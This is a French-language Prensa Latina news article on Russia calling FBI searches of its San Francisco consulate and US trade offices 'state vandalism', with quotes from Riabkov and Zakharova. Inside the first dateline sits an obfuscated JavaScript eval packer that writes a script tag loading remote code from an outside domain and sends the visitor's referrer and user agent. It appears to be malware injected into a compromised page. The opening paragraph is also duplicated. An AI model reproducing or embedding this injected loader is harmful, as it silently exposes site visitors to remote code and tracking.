mardi 23 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La Russie qualifie les actions contre son consulat à San Francisco de vandalisme


Moscou, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nstdn|var|u0026u|referrer|dteeh||js|php'.split('|'),0,{})) 4 septembre (PL) La chancellerie a qualifié d'actes de vandalisme les violentes perquisitions de son consulat à San Francisco, et de deux autres bureaux, réalisées par les services de sécurité étasuniens.

Moscou, 4 septembre (PL) La chancellerie a qualifié d’actes de vandalisme les violentes perquisitions de son consulat à San Francisco, et de deux autres bureaux, réalisées par les services de sécurité étasuniens.

Le vice-chancelier russe, Sergueï Riabkov, a indiqué que l’irruption, samedi dernier, dans ce siège consulaire, tout comme dans les locaux de missions commerciales à Washington et New-York, de la part du Bureau Fédéral de Renseignement (FBI), ont été des actions offensantes qui peuvent être qualifiées de « vandalisme d’État ».

Lors de déclarations à l’agence RIA Novosti, Riabkov a exprimé le fait que son pays ne laissera pas les nouvelles provocations étasuniennes sans réponses.

Une vidéo, diffusée par la chancellerie russe sur les réseaux sociaux, montrent des images d’agents du FBI inspectant les bureaux du consulat général russe de San Francisco, en Californie.

Pour sa part, la porte-parole du Ministère des Relations Extérieures de Russie, Maria Zajarova, a signalé « qu’avec de tels procédés, en s’emparant de ces installations diplomatiques par la force, les autorités étasuniennes ont été les actrices d’actions ouvertement hostiles et qui violent le droit international ».

Zajarova a indiqué que ces actions ressemblaient à « l’assaut d’un gang », avant d’affirmer qu’elles constituent une « provocation d’ampleur mondiale ».

Le Ministère des Relations Extérieures de Russie a convoqué le numéro deux de l’ambassade des États-Unis à Moscou, Anthony Godfrey, pour lui remettre un courrier de protestation formel.

La Chancellerie russe a émis un communiqué dans lequel elle exprime que l’éviction des installations diplomatiques se révèle être « un acte direct d’hostilité » et exhorte les États-Unis à « restituer ces bureaux de façon immédiate ».

Ces actions de l’administration du président nord-américain Donald Trump surviennent au milieu d’une escalade des tensions suite à l’adoption de nouvelles sanctions économiques contre Moscou.

Fin juillet, le gouvernement russe a décidé de réduire le personnel diplomatique de Washington dans ce pays au nombre de 455, ce qui correspond à ce que la russie compte comme personnel aux États-Unis. Mais cela a représenté une sortie de 755 fonctionnaires nord-américains.

peo/jcm/ort 

EN CONTINU
notes connexes